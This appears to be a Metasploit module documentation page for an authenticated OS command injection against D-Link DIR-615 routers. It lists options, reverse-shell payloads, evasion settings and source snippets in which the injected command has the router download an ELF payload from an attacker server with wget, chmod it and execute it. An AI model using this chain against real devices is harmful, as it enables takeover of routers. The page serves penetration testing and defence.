D-Link DIR615h OS Command Injection - Metasploit


This page contains detailed information about how to use the exploit/linux/http/dlink_dir615_up_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: D-Link DIR615h OS Command Injection
Module: exploit/linux/http/dlink_dir615_up_exec
Source code: modules/exploits/linux/http/dlink_dir615_up_exec.rb
Disclosure date: 2013-02-07
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): Linux, Unix
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: -

Some D-Link Routers are vulnerable to an authenticated OS command injection on their web interface, where default credentials are admin/admin or admin/password. Since it is a blind os command injection vulnerability, there is no output for the executed command when using the cmd generic payload. This module was tested against a DIR-615 hardware revision H1 - firmware version 8.04. A ping command against a controlled system could be used for testing purposes. The exploit uses the wget client from the device to convert the command injection into an arbitrary payload execution.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


msf > use exploit/linux/http/dlink_dir615_up_exec
msf exploit(dlink_dir615_up_exec) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the linux/http/dlink_dir615_up_exec exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/dlink_dir615_up_exec

[*] No payload configured, defaulting to linux/mipsle/meterpreter/reverse_tcp
msf6 exploit(linux/http/dlink_dir615_up_exec) > show info

       Name: D-Link DIR615h OS Command Injection
     Module: exploit/linux/http/dlink_dir615_up_exec
   Platform: Linux, Unix
       Arch: 
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2013-02-07

Provided by:
  Michael Messner <[email protected]>
  juan vazquez <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   CMD
  1   Linux mipsel Payload

Check supported:
  No

Basic options:
  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  DOWNFILE                     no        Filename to download, (default: random)
  DOWNHOST                     no        An alternative host to request the MIPS payload from
  HTTP_DELAY  60               yes       Time that the HTTP Server will wait for the ELF payload request
  PASSWORD    admin            yes       The password for the specified username
  Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT       80               yes       The target port (TCP)
  SRVHOST     0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT     8080             yes       The local port to listen on.
  SSL         false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                      no        The URI to use for this exploit (default is random)
  USERNAME    admin            yes       The username to authenticate as
  VHOST                        no        HTTP server virtual host

Payload information:

Description:
  Some D-Link Routers are vulnerable to an authenticated OS command 
  injection on their web interface, where default credentials are 
  admin/admin or admin/password. Since it is a blind os command 
  injection vulnerability, there is no output for the executed command 
  when using the cmd generic payload. This module was tested against a 
  DIR-615 hardware revision H1 - firmware version 8.04. A ping command 
  against a controlled system could be used for testing purposes. The 
  exploit uses the wget client from the device to convert the command 
  injection into an arbitrary payload execution.

References:
  http://www.securityfocus.com/bid/57882
  https://www.exploit-db.com/exploits/24477
  OSVDB (90174)
  http://www.s3cur1ty.de/m1adv2013-008

Module Options


This is a complete list of options available in the linux/http/dlink_dir615_up_exec exploit:

msf6 exploit(linux/http/dlink_dir615_up_exec) > show options

Module options (exploit/linux/http/dlink_dir615_up_exec):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   DOWNFILE                     no        Filename to download, (default: random)
   DOWNHOST                     no        An alternative host to request the MIPS payload from
   HTTP_DELAY  60               yes       Time that the HTTP Server will wait for the ELF payload request
   PASSWORD    admin            yes       The password for the specified username
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT       80               yes       The target port (TCP)
   SRVHOST     0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                      no        The URI to use for this exploit (default is random)
   USERNAME    admin            yes       The username to authenticate as
   VHOST                        no        HTTP server virtual host

Payload options (linux/mipsle/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   1   Linux mipsel Payload

Advanced Options


Here is a complete list of advanced options supported by the linux/http/dlink_dir615_up_exec exploit:

msf6 exploit(linux/http/dlink_dir615_up_exec) > show advanced

Module advanced options (exploit/linux/http/dlink_dir615_up_exec):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EXE::Custom                                                                 no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false                                               no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false                                               no        Use the default template in case the specified one is missing
   EXE::Inject             false                                               no        Set to preserve the original EXE function
   EXE::OldMethod          false                                               no        Set to use the substitution EXE generation method.
   EXE::Path                                                                   no        The directory in which to look for the executable template
   EXE::Template                                                               no        The executable template file name.
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FileDropperDelay                                                            no        Delay in seconds before attempting cleanup
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   ListenerComm                                                                no        The specific communication channel to use for this service
   MSI::Custom                                                                 no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false                                               no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                                                   no        The directory in which to look for the msi template
   MSI::Template                                                               no        The msi template file name
   MSI::UAC                false                                               no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   SSLCipher                                                                   no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression          false                                               no        Enable SSL/TLS-level compression
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   SendRobots              false                                               no        Return a robots.txt file if asked for one
   URIHOST                                                                     no        Host to use in URI (useful for tunnels)
   URIPORT                                                                     no        Port to use in URI (useful for tunnels)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module

Payload advanced options (linux/mipsle/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AppendExit                   false            no        Append a stub that executes the exit(0) system call
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugLevel        0                yes       Set debug level for meterpreter 0-3 (Default output is strerr)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependChrootBreak           false            no        Prepend a stub that will break out of a chroot (includes setreuid to root)
   PrependFork                  false            no        Prepend a stub that starts the payload in its own process via fork
   PrependSetgid                false            no        Prepend a stub that executes the setgid(0) system call
   PrependSetregid              false            no        Prepend a stub that executes the setregid(0, 0) system call
   PrependSetresgid             false            no        Prepend a stub that executes the setresgid(0, 0, 0) system call
   PrependSetresuid             false            no        Prepend a stub that executes the setresuid(0, 0, 0) system call
   PrependSetreuid              false            no        Prepend a stub that executes the setreuid(0, 0) system call
   PrependSetuid                false            no        Prepend a stub that executes the setuid(0) system call
   RemoteMeterpreterDebugFile                    no        Redirect Debug Info to a Log File
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/dlink_dir615_up_exec module can exploit:

msf6 exploit(linux/http/dlink_dir615_up_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   CMD
   1   Linux mipsel Payload

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/dlink_dir615_up_exec exploit:

msf6 exploit(linux/http/dlink_dir615_up_exec) > show payloads

Compatible Payloads
===================

   #   Name                                            Disclosure Date  Rank    Check  Description
   -   ----                                            ---------------  ----    -----  -----------
   0   payload/generic/custom                                           normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                                   normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                                normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/linux/mipsle/exec                                        normal  No     Linux Execute Command
   4   payload/linux/mipsle/meterpreter/reverse_tcp                     normal  No     Linux Meterpreter, Reverse TCP Stager
   5   payload/linux/mipsle/meterpreter_reverse_http                    normal  No     Linux Meterpreter, Reverse HTTP Inline
   6   payload/linux/mipsle/meterpreter_reverse_https                   normal  No     Linux Meterpreter, Reverse HTTPS Inline
   7   payload/linux/mipsle/meterpreter_reverse_tcp                     normal  No     Linux Meterpreter, Reverse TCP Inline
   8   payload/linux/mipsle/reboot                                      normal  No     Linux Reboot
   9   payload/linux/mipsle/shell/reverse_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager
   10  payload/linux/mipsle/shell_bind_tcp                              normal  No     Linux Command Shell, Bind TCP Inline
   11  payload/linux/mipsle/shell_reverse_tcp                           normal  No     Linux Command Shell, Reverse TCP Inline

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/dlink_dir615_up_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/dlink_dir615_up_exec) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::chunked                 false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression             none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::junk_headers            false            no        Enable insertion of random junk HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::no_cache                false            no        Disallow the browser to cache HTTP content
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::server_name             Apache           yes       Configures the Server header of all outgoing replies
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request
   TCP::max_send_size            0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay               0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<RHOST>:<RPORT> - Failed to connect to the web server


Here is a relevant code snippet related to the "<RHOST>:<RPORT> - Failed to connect to the web server" error message:

85:	          "ping6_ipaddr" => ""
86:	        }
87:	      })
88:	      return res
89:	    rescue ::Rex::ConnectionError
90:	      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
91:	      return nil
92:	    end
93:	  end
94:	
95:	  def exploit

<RHOST>:<RPORT> - No successful login possible with <USER>/<PASS>


Here is a relevant code snippet related to the "<RHOST>:<RPORT> - No successful login possible with <USER>/<PASS>" error message:

116:	          "passwd" => pass,
117:	          "captchapwd" => ""
118:	        }
119:	      })
120:	      if res.nil? or res.code == 404
121:	        fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
122:	      end
123:	      if res.body =~ /\<script\ langauge\=\"javascript\"\>showMainTabs\(\"setup\"\)\;\<\/script\>/
124:	        print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
125:	      else
126:	        fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")

<RHOST>:<RPORT> - No successful login possible with <USER>/<PASS>


Here is a relevant code snippet related to the "<RHOST>:<RPORT> - No successful login possible with <USER>/<PASS>" error message:

121:	        fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
122:	      end
123:	      if res.body =~ /\<script\ langauge\=\"javascript\"\>showMainTabs\(\"setup\"\)\;\<\/script\>/
124:	        print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
125:	      else
126:	        fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
127:	      end
128:	    rescue ::Rex::ConnectionError
129:	      fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server")
130:	    end
131:	

<RHOST>:<RPORT> - Failed to connect to the web server


Here is a relevant code snippet related to the "<RHOST>:<RPORT> - Failed to connect to the web server" error message:

124:	        print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
125:	      else
126:	        fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
127:	      end
128:	    rescue ::Rex::ConnectionError
129:	      fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server")
130:	    end
131:	
132:	    if target.name =~ /CMD/
133:	      if not (datastore['CMD'])
134:	        fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")

<RHOST>:<RPORT> - Only the cmd/generic payload is compatible


Here is a relevant code snippet related to the "<RHOST>:<RPORT> - Only the cmd/generic payload is compatible" error message:

129:	      fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server")
130:	    end
131:	
132:	    if target.name =~ /CMD/
133:	      if not (datastore['CMD'])
134:	        fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
135:	      end
136:	      cmd = payload.encoded
137:	      res = request(cmd)
138:	      if (!res)
139:	        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")

<RHOST>:<RPORT> - Unable to execute payload


Here is a relevant code snippet related to the "<RHOST>:<RPORT> - Unable to execute payload" error message:

134:	        fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
135:	      end
136:	      cmd = payload.encoded
137:	      res = request(cmd)
138:	      if (!res)
139:	        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
140:	      else
141:	        print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
142:	      end
143:	      return
144:	    end

<RHOST>:<RPORT> - Unable to deploy payload


Here is a relevant code snippet related to the "<RHOST>:<RPORT> - Unable to deploy payload" error message:

188:	
189:	    #not working if we send all command together -> lets take three requests
190:	    cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}"
191:	    res = request(cmd)
192:	    if (!res)
193:	      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
194:	    end
195:	
196:	    # wait for payload download
197:	    if (datastore['DOWNHOST'])
198:	      print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the D-Link device to download the payload")

<RHOST>:<RPORT> - Unable to deploy payload


Here is a relevant code snippet related to the "<RHOST>:<RPORT> - Unable to deploy payload" error message:

210:	    #
211:	    cmd = "chmod 777 /tmp/#{filename}"
212:	    print_status("#{rhost}:#{rport} - Asking the D-Link device to chmod #{downfile}")
213:	    res = request(cmd)
214:	    if (!res)
215:	      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
216:	    end
217:	    print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration")
218:	    select(nil, nil, nil, @timeout)
219:	
220:	    #

<RHOST>:<RPORT> - Unable to deploy payload


Here is a relevant code snippet related to the "<RHOST>:<RPORT> - Unable to deploy payload" error message:

222:	    #
223:	    cmd = "/tmp/#{filename}"
224:	    print_status("#{rhost}:#{rport} - Asking the D-Link device to execute #{downfile}")
225:	    res = request(cmd)
226:	    if (!res)
227:	      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
228:	    end
229:	
230:	  end
231:	
232:	  # Handle incoming requests from the server

<RHOST>:<RPORT> - A request came in, but the payload wasn't ready yet!


Here is a relevant code snippet related to the "<RHOST>:<RPORT> - A request came in, but the payload wasn't ready yet!" error message:

231:	
232:	  # Handle incoming requests from the server
233:	  def on_request_uri(cli, request)
234:	    #print_status("on_request_uri called: #{request.inspect}")
235:	    if (not @pl)
236:	      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
237:	      return
238:	    end
239:	    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
240:	    @elf_sent = true
241:	    send_response(cli, @pl)

<RHOST>:<RPORT> - Target didn't request request the ELF payload -- Maybe it cant connect back to us?


Here is a relevant code snippet related to the "<RHOST>:<RPORT> - Target didn't request request the ELF payload -- Maybe it cant connect back to us?" error message:

247:	
248:	    waited = 0
249:	    while (not @elf_sent)
250:	      select(nil, nil, nil, 1)
251:	      waited += 1
252:	      if (waited > datastore['HTTP_DELAY'])
253:	        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?")
254:	      end
255:	    end
256:	  end
257:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Michael Messner <devnull[at]s3cur1ty.de>
  • juan vazquez

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.